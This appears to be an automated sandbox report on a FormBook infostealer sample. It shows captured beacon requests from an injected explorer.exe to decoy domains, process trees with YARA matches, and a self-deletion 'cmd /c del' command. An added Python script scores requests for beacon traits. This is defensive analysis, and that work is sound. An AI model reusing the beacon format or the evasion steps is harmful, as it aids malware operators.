Data Ascii: <!doctype html><html lang="en"><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>404 Error</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="robots" content="noindex, nofollow"> <style> @media screen and (max-width:500px) { body { font-size: .6em; } } </style></head><body style="text-align: center;"> <h1 style="font-family: Georgia, serif; color: #4a4a4a; margin-top: 4em; line-height: 1.5;"> Sorry, this page doesn't exist.<br>Please check the URL or go back a page. </h1> <h2 style=" font-family: Verdana, sans-serif; color: #7d7d7d; font-weight: 300;"> 404 Error. Page Not Found. </h2> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.5 | 49750 | 23.225.101.32 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jun 22, 2021 18:25:50.296525002 CEST | 9749 | OUT | GET /bp3i/?2db=zwAt45JEztQSRxPdch59MI6sbMm9ozxv/QrdgZuHtz8DMTYJ2HUJlOY3K2JoQYzD174Y&ApZx=O2MHiVr0W HTTP/1.1
Host: www.9wsc.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jun 22, 2021 18:25:50.530720949 CEST | 9750 | IN | HTTP/1.1 200 OK
Date: Tue, 22 Jun 2021 16:25:43 GMT
Content-Length: 788
Content-Type: text/html
Server: nginx
                                                                                                                  Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);})();</script></head><script language="javascript" type="text/javascript" src="/common.js"></script><script language="javascript" type="text/javascript" src="/tj.js"></script></body></html>


Session ID: 7 | Source IP: 192.168.2.5 | Source Port: 49751 | Destination IP: 194.136.40.51 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jun 22, 2021 18:25:55.696207047 CEST | 9752 | OUT | GET /bp3i/?2db=zbNXh78uhP7VzN8kPHFueaY47g6J6psPJhyFJvfKuCHih9LJaB8PnmAAQmuNnVgiv7yX&ApZx=O2MHiVr0W HTTP/1.1
                                                                                                                  Host: www.5xlsteve.com
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:
Jun 22, 2021 18:25:55.754239082 CEST | 9752 | IN | HTTP/1.1 404 Not Found
                                                                                                                  Server: nginx
                                                                                                                  Date: Tue, 22 Jun 2021 16:25:55 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 793
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 47 42 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 57 61 6e 74 20 79 6f 75 72 20 6f 77 6e 20 77 65 62 73 69 74 65 3f 20 7c 20 31 32 33 20 52 65 67 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 2d 75 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 52 4f 42 4f 54 53 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 4e 4f 46 4f 4c 4c 4f 57 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 47 65 74 20 6f 6e 6c 69 6e 65 20 77 69 74 68 20 57 65 62 73 69 74 65 20 42 75 69 6c 64 65 72 21 20 43 72 65 61 74 65 20 61 20 66 72 65 65 20 32 2d 70 61 67 65 20 77 65 62 73 69 74 65 20 74 6f 20 67 6f 20 77 69 74 68 20 79 6f 75 72 20 6e 65 77 20 64 6f 6d 61 69 6e 2e 20 53 74 61 72 74 20 6e 6f 77 20 66 6f 72 20 66 72 65 65 2c 20 6e 6f 20 63 72 65 64 69 74 20 63 61 72 64 20 72 65 71 75 69 72 65 64 21 22 2f 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2f 73 74 79 6c 65 73 68 65 65 74 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 
66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 69 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 31 32 33 2d 72 65 67 2d 6e 65 77 2d 64 6f 6d 61 69 6e 2e 63 6f 2e 75 6b 2f 69 66 72 61 6d 65 2e 68 74 6d 6c 22 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en-GB"><head><title>Want your own website? | 123 Reg</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><meta http-equiv="Content-Language" content="en-us" /><meta name="ROBOTS" content="NOINDEX, NOFOLLOW"><meta name="description" content="Get online with Website Builder! Create a free 2-page website to go with your new domain. Start now for free, no credit card required!"/> <meta name="viewport" content="width=device-width"><link rel="stylesheet" href="/style/stylesheet.css" type="text/css" media="all"> <link rel="icon" type="image/png" href="favicon-32x32.png" sizes="32x32"></head><body> <iframe src="https://www.123-reg-new-domain.co.uk/iframe.html" width="100%" scrolling="no"></iframe></body></html>


Session ID: 8 | Source IP: 192.168.2.5 | Source Port: 49752 | Destination IP: 184.168.131.241 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jun 22, 2021 18:26:01.057169914 CEST | 9753 | OUT | GET /bp3i/?2db=+tA82deiMnBv5x6tQvXabF4qHjy6FJLdLGXe/FevxPH8etKnEP6uMBOxOd38qIM/2l+B&ApZx=O2MHiVr0W HTTP/1.1
                                                                                                                  Host: www.oceancollaborative.com
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:
Jun 22, 2021 18:26:01.285360098 CEST | 9754 | IN | HTTP/1.1 302 Found
                                                                                                                  Server: nginx/1.16.1
                                                                                                                  Date: Tue, 22 Jun 2021 16:26:01 GMT
                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Location: https://afternic.com/forsale/oceancollaborative.com?utm_source=TDFS&utm_medium=sn_affiliate_click&utm_campaign=TDFS_GoDaddy_DLS&traffic_type=TDFS&traffic_id=GoDaddy_DLS
                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


Session ID: 9 | Source IP: 192.168.2.5 | Source Port: 49753 | Destination IP: 34.102.136.180 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jun 22, 2021 18:26:06.429832935 CEST | 9755 | OUT | GET /bp3i/?2db=zzYPr0OAQH7TXWaM6HNOV25V/HRJbXLG3d0AEq0Xu0niOsubCwaCiuhJfb7NIA/TR+lf&ApZx=O2MHiVr0W HTTP/1.1
                                                                                                                  Host: www.motivactivewear.com
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:
Jun 22, 2021 18:26:06.571907043 CEST | 9755 | IN | HTTP/1.1 403 Forbidden
                                                                                                                  Server: openresty
                                                                                                                  Date: Tue, 22 Jun 2021 16:26:06 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 275
                                                                                                                  ETag: "60cf306c-113"
                                                                                                                  Via: 1.1 google
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
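The three explorer.exe sessions above share one request shape while the Host header rotates: a short directory (`/bp3i/`), a long base64-alphabet value in the first query parameter, a second parameter `ApZx=O2MHiVr0W` that never changes, no User-Agent header at all, `Connection: close`, and seven 0x00 bytes sent after the blank line of a GET. The script below is an added example written for this page; it is not part of the Joe Sandbox report and not code from the malware. It parses the captured requests as raw bytes, scores each one against those traits, and extracts the query token that stays constant across hosts as a pivot for hunting the same build elsewhere. The indicator names, the score threshold, the regex bounds and the benign comparison request (hypothetical host `www.example.com`) are the editor's assumptions derived only from the traffic shown above.

```python
"""Triage captured HTTP requests for the beacon shape seen in the report.

Added example, not from the sandbox report or the malware: every heuristic
below is derived from the three explorer.exe requests captured above.
Indicator names, thresholds and the benign request are assumptions.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple

# Constructed from the three captured sessions: (process, raw request bytes).
# The seven trailing 0x00 bytes reproduce the "Data Raw" that followed each GET.
CAPTURED = [
    ("C:\\Windows\\explorer.exe",
     b"GET /bp3i/?2db=zbNXh78uhP7VzN8kPHFueaY47g6J6psPJhyFJvfKuCHih9LJaB8PnmAAQmuNnVgiv7yX&ApZx=O2MHiVr0W HTTP/1.1\r\n"
     b"Host: www.5xlsteve.com\r\nConnection: close\r\n\r\n" + b"\x00" * 7),
    ("C:\\Windows\\explorer.exe",
     b"GET /bp3i/?2db=+tA82deiMnBv5x6tQvXabF4qHjy6FJLdLGXe/FevxPH8etKnEP6uMBOxOd38qIM/2l+B&ApZx=O2MHiVr0W HTTP/1.1\r\n"
     b"Host: www.oceancollaborative.com\r\nConnection: close\r\n\r\n" + b"\x00" * 7),
    ("C:\\Windows\\explorer.exe",
     b"GET /bp3i/?2db=zzYPr0OAQH7TXWaM6HNOV25V/HRJbXLG3d0AEq0Xu0niOsubCwaCiuhJfb7NIA/TR+lf&ApZx=O2MHiVr0W HTTP/1.1\r\n"
     b"Host: www.motivactivewear.com\r\nConnection: close\r\n\r\n" + b"\x00" * 7),
]

# Constructed benign request for comparison (hypothetical process and host).
BENIGN = ("C:\\Program Files\\Browser\\browser.exe",
          b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
          b"User-Agent: Mozilla/5.0\r\nAccept: text/html\r\nConnection: keep-alive\r\n\r\n")


@dataclass
class HttpRequest:
    method: str
    path: str
    query: Dict[str, str]    # raw values: no '+' or percent decoding
    headers: Dict[str, str]  # header names lower-cased
    body: bytes              # whatever followed the blank line


def parse_request(raw: bytes) -> HttpRequest:
    """Split a raw request into request line, headers and trailing bytes."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    path, _, query_string = target.partition("?")
    query: Dict[str, str] = {}
    for pair in filter(None, query_string.split("&")):
        name, _, value = pair.partition("=")
        query[name] = value  # '+' and '/' are base64 alphabet here, keep them verbatim
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, path, query, headers, body)


BASE64ISH = re.compile(r"^[A-Za-z0-9+/]{32,}={0,2}$")   # assumed minimum length
SHORT_DIR = re.compile(r"^/[A-Za-z0-9]{2,6}/$")           # e.g. /bp3i/


def beacon_indicators(req: HttpRequest) -> Dict[str, bool]:
    """One flag per trait of the captured requests; none is conclusive alone."""
    values = list(req.query.values())
    return {
        "short_random_dir": bool(SHORT_DIR.match(req.path)),
        "two_params_first_base64": len(values) == 2 and bool(BASE64ISH.match(values[0])),
        "no_user_agent": "user-agent" not in req.headers,
        "connection_close": req.headers.get("connection", "").lower() == "close",
        "null_bytes_after_get": req.method == "GET" and len(req.body) > 0 and set(req.body) == {0},
    }


def is_beacon_like(req: HttpRequest, threshold: int = 4) -> bool:
    """Threshold of 4 out of 5 is an assumption; tune it on your own traffic."""
    return sum(beacon_indicators(req).values()) >= threshold


def shared_tokens(requests: List[HttpRequest]) -> Set[Tuple[str, str]]:
    """Query (name, value) pairs repeated unchanged across two or more hosts.

    A token that stays constant while Host rotates is a pivot for finding the
    same build talking to other domains in the same config.
    """
    hosts_per_token: Dict[Tuple[str, str], Set[str]] = {}
    for req in requests:
        host = req.headers.get("host", "")
        for item in req.query.items():
            hosts_per_token.setdefault(item, set()).add(host)
    return {tok for tok, hosts in hosts_per_token.items() if len(hosts) >= 2}


def triage(captured=CAPTURED) -> List[Tuple[str, str, bool]]:
    """Return (process, host, beacon_like) for each captured request."""
    rows = []
    for process, raw in captured:
        req = parse_request(raw)
        rows.append((process, req.headers.get("host", ""), is_beacon_like(req)))
    return rows


if __name__ == "__main__":
    for row in triage():
        print(row)
    print(shared_tokens([parse_request(raw) for _, raw in CAPTURED]))
```

Key on the request shape rather than on the responding hosts: the three hosts answered with a registrar's 404 page, a redirect to a domain-for-sale page and a 403, which fits FormBook's documented habit of cycling through decoy domains alongside its real C2, so host reputation alone would miss most of the beacons while the constant `ApZx=O2MHiVr0W` token and the missing User-Agent are visible in every one of them.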


                                                                                                                  Code Manipulations

                                                                                                                  Statistics

                                                                                                                  Behavior


                                                                                                                  System Behavior

                                                                                                                  General

                                                                                                                  Start time:18:24:02
                                                                                                                  Start date:22/06/2021
                                                                                                                  Path:C:\Users\user\Desktop\WXs8v9QuE7.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Users\user\Desktop\WXs8v9QuE7.exe'
                                                                                                                  Imagebase:0x400000
                                                                                                                  File size:205564 bytes
                                                                                                                  MD5 hash:1F45B0E2BD669BCE49B2140373243A91
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.234632284.0000000002280000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.234632284.0000000002280000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.234632284.0000000002280000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                  Reputation:low

                                                                                                                  General

                                                                                                                  Start time:18:24:03
                                                                                                                  Start date:22/06/2021
                                                                                                                  Path:C:\Users\user\Desktop\WXs8v9QuE7.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Users\user\Desktop\WXs8v9QuE7.exe'
                                                                                                                  Imagebase:0x400000
                                                                                                                  File size:205564 bytes
                                                                                                                  MD5 hash:1F45B0E2BD669BCE49B2140373243A91
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.231883360.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.231883360.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.231883360.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.301526292.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.301526292.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.301526292.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.301567040.00000000004C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.301567040.00000000004C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.301567040.00000000004C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.301714612.00000000005D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.301714612.00000000005D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.301714612.00000000005D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                  Reputation:low

                                                                                                                  General

                                                                                                                  Start time:18:24:07
                                                                                                                  Start date:22/06/2021
                                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                                                                  Imagebase:0x7ff693d90000
                                                                                                                  File size:3933184 bytes
                                                                                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  General

                                                                                                                  Start time:18:24:31
                                                                                                                  Start date:22/06/2021
                                                                                                                  Path:C:\Windows\SysWOW64\autoconv.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\SysWOW64\autoconv.exe
                                                                                                                  Imagebase:0xfa0000
                                                                                                                  File size:851968 bytes
                                                                                                                  MD5 hash:4506BE56787EDCD771A351C10B5AE3B7
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:moderate

                                                                                                                  General

                                                                                                                  Start time:18:24:37
                                                                                                                  Start date:22/06/2021
                                                                                                                  Path:C:\Windows\SysWOW64\cscript.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Windows\SysWOW64\cscript.exe
                                                                                                                  Imagebase:0xac0000
                                                                                                                  File size:143360 bytes
                                                                                                                  MD5 hash:00D3041E47F99E48DD5FFFEDF60F6304
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.493603616.0000000000A90000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.493603616.0000000000A90000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.493603616.0000000000A90000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.492153305.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.492153305.0000000000560000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.492153305.0000000000560000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.494502874.0000000002CF0000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.494502874.0000000002CF0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.494502874.0000000002CF0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate

General

Start time: 18:24:39
Start date: 22/06/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del 'C:\Users\user\Desktop\WXs8v9QuE7.exe'
Imagebase: 0x8c0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 18:24:40
Start date: 22/06/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7ecfc0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Disassembly

Code Analysis